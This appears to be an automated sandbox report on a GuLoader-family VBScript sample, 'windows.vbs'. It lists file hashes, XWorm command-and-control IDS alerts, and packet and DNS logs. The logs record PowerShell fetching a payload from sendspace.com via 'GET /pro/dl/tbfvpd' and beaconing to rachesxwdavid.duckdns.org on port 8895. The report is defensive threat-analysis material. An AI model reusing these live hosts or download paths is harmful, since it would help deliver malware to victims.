                                                                        • 69.31.136.17
                                                                        37f463bf4616ecd445d4a1937da06e19update.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        windows.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        Clear.7zGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        No context
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.8908305915084105
                                                                        Encrypted:false
                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllultnxj:NllU
                                                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:@...e................................................@..........
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):448940
                                                                        Entropy (8bit):5.93828516382934
                                                                        Encrypted:false
                                                                        SSDEEP:12288:3Kl7pme+1y7jQjfswBeaFvFQ9R5dDVtyDoTl9O:34+ujkfxBO5dJtLs
                                                                        MD5:81DB82EDAE38BF944999451235D9E9C0
                                                                        SHA1:2250F98C9BFC16D3A5CA9560CB3447AABE04A570
                                                                        SHA-256:E593978C513F1C50D0A811AD19022BE63B110D3293C25F4693C820305D3CDEA9
                                                                        SHA-512:C51EB0F644194599484E63F5DEDCC180BEE5CE64A79D7137E8E3413BEA1BB30763438CEB8A8C663F7CD4908F1BFE6642036C6446876F3E078FF9CAAA15645BCE
                                                                        Malicious:false
                                                                        File type:ASCII text, with CRLF line terminators
                                                                        Entropy (8bit):5.070380022746645
                                                                        TrID:
                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                        File name:windows.vbs
                                                                        File size:74'750 bytes
                                                                        MD5:828b53e8f1faed52722f7b7dd53c8c92
                                                                        SHA1:f80c8f0bcb94ea38d10e239b203e4e990b649540
                                                                        SHA256:d0f73c23361be86872a1a87ef43e998a0e1e4fabbd40f5cd86ae333e1a09bdb7
                                                                        SHA512:9273d55d7e193a3853b15dbc7d35cf545e00fb82428d22f554124cd74d694629fe775e626adcdc577d6961c8a86f9d2a57ea822f933533eff82a9a38c2420d87
                                                                        SSDEEP:1536:xvv1gPn2+VbGSZ0way5Nv6/+sfoYNkvYX4+1pFlEixGvQ:x2PRVbnZB5M2s1+r+1rFGvQ
                                                                        TLSH:9B735BD1EB69094A8C4B2799FF51CD41CABC8A05052332A1BEC9077E610B86C93FD6DF
                                                                        File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Premeditations = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman s
                                                                        Icon Hash:68d69b8f86ab9a86
                                                                         Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                         05/23/24-18:27:12.688536 | TCP | 2852870 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes | 8895 | 49713 | 57.128.155.22 | 192.168.2.9
                                                                         05/23/24-18:27:12.688536 | TCP | 2852874 | ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 | 8895 | 49713 | 57.128.155.22 | 192.168.2.9
                                                                         05/23/24-18:26:11.361514 | TCP | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49713 | 8895 | 192.168.2.9 | 57.128.155.22
                                                                        May 23, 2024 18:25:12.040595055 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.040740967 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.040751934 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.040803909 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.096935987 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.097007990 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.097135067 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.097146034 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.097176075 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.097199917 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.106322050 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.106390953 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.106529951 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.106539011 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.106592894 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.113320112 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.113337040 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.113626957 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.113636017 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.113686085 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.119827986 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.119848013 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.119995117 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.120007038 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.120104074 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.125457048 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.125473976 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.125597000 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.125605106 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.125691891 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.130768061 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.130790949 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.130912066 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.130919933 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.131026983 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.184000015 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.184025049 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.184310913 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.184320927 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.184427023 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.190567017 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.190584898 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.190737963 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.190746069 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.190855980 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.194617033 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.194633961 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.194744110 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.194752932 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.194829941 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.197619915 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.197647095 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.197796106 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.197803020 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.197900057 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.203089952 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.203120947 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.203314066 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.203320980 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.203433990 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.207360029 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.207386971 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.207557917 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.207565069 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.207618952 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.214823961 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.214848995 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.214977026 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.214984894 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.215033054 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.219151974 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.219177961 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.219280005 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.219286919 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.219333887 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.275407076 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.275443077 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.275491953 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.275525093 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.275552034 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.275576115 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.279584885 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.279604912 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.279664040 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.279674053 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.279714108 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.282710075 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.282730103 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.282803059 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.282812119 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.282850981 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.285062075 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.285084009 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.285155058 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.285162926 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.285208941 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.289051056 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.289072990 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.289141893 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.289151907 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.289189100 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.296766996 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.296786070 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.296849012 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.296860933 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.296897888 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.300733089 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.300760031 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.300829887 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.300837994 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.300879955 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.301564932 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.301636934 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.301642895 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.301688910 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.302067995 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:53.853878021 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:53.853907108 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:53.854199886 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:53.880204916 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:53.880228043 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.492351055 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.492491961 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.571527958 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.571547985 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.572509050 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.572634935 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.576278925 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.622522116 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.854821920 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.854901075 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.855006933 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.855006933 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.859993935 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.860014915 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.913959026 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:54.914026022 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:54.914099932 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:54.914710045 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:54.914733887 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.833471060 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.833646059 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.841075897 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.841093063 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.841329098 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.841408968 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.842037916 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.886493921 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149379015 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149415016 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149451971 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149482012 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.149482012 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.149492025 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149517059 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.150367022 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.157744884 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.157782078 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.157866955 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.157866955 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.157875061 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.157910109 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.158863068 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.158942938 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.158947945 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.158977985 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.158982992 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159027100 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159027100 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159033060 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.159055948 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.159183025 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:59.648607969 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:25:59.678790092 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:25:59.679408073 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:25:59.956298113 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:25:59.976969957 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:11.361514091 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:11.372457027 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:12.708563089 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:12.812195063 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:22.765738964 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:22.778700113 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:34.172461987 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:34.422003984 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:34.444237947 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:34.444737911 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:42.855367899 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:42.906280994 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:45.579266071 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:45.627641916 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:26:56.985131025 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:26:56.990108013 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:27:05.844082117 CEST497138895192.168.2.957.128.155.22
                                                                        May 23, 2024 18:27:05.907345057 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:27:12.688535929 CEST88954971357.128.155.22192.168.2.9
                                                                        May 23, 2024 18:27:12.734462976 CEST497138895192.168.2.957.128.155.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 18:25:10.054425001 CEST | 49968 | 53 | 192.168.2.9 | 1.1.1.1
May 23, 2024 18:25:10.064584017 CEST | 53 | 49968 | 1.1.1.1 | 192.168.2.9
May 23, 2024 18:25:10.857893944 CEST | 56976 | 53 | 192.168.2.9 | 1.1.1.1
May 23, 2024 18:25:10.912872076 CEST | 53 | 56976 | 1.1.1.1 | 192.168.2.9
May 23, 2024 18:25:54.865331888 CEST | 56420 | 53 | 192.168.2.9 | 1.1.1.1
May 23, 2024 18:25:54.912864923 CEST | 53 | 56420 | 1.1.1.1 | 192.168.2.9
May 23, 2024 18:25:59.491137981 CEST | 54464 | 53 | 192.168.2.9 | 1.1.1.1
May 23, 2024 18:25:59.646441936 CEST | 53 | 54464 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 18:25:10.054425001 CEST | 192.168.2.9 | 1.1.1.1 | 0xf5e5 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:10.857893944 CEST | 192.168.2.9 | 1.1.1.1 | 0x3651 | Standard query (0) | fs03n1.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:54.865331888 CEST | 192.168.2.9 | 1.1.1.1 | 0x35a7 | Standard query (0) | fs13n5.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:59.491137981 CEST | 192.168.2.9 | 1.1.1.1 | 0xa23e | Standard query (0) | rachesxwdavid.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 18:25:10.064584017 CEST | 1.1.1.1 | 192.168.2.9 | 0xf5e5 | No error (0) | www.sendspace.com | | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:10.064584017 CEST | 1.1.1.1 | 192.168.2.9 | 0xf5e5 | No error (0) | www.sendspace.com | | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:10.912872076 CEST | 1.1.1.1 | 192.168.2.9 | 0x3651 | No error (0) | fs03n1.sendspace.com | | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:54.912864923 CEST | 1.1.1.1 | 192.168.2.9 | 0x35a7 | No error (0) | fs13n5.sendspace.com | | 69.31.136.57 | A (IP address) | IN (0x0001) | false
May 23, 2024 18:25:59.646441936 CEST | 1.1.1.1 | 192.168.2.9 | 0xa23e | No error (0) | rachesxwdavid.duckdns.org | | 57.128.155.22 | A (IP address) | IN (0x0001) | false
                                                                        • www.sendspace.com
                                                                        • fs03n1.sendspace.com
                                                                        • fs13n5.sendspace.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49706 | 172.67.170.105 | 443 | 7308 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 16:25:10 UTC | 174 | OUT | GET /pro/dl/tbfvpd HTTP/1.1
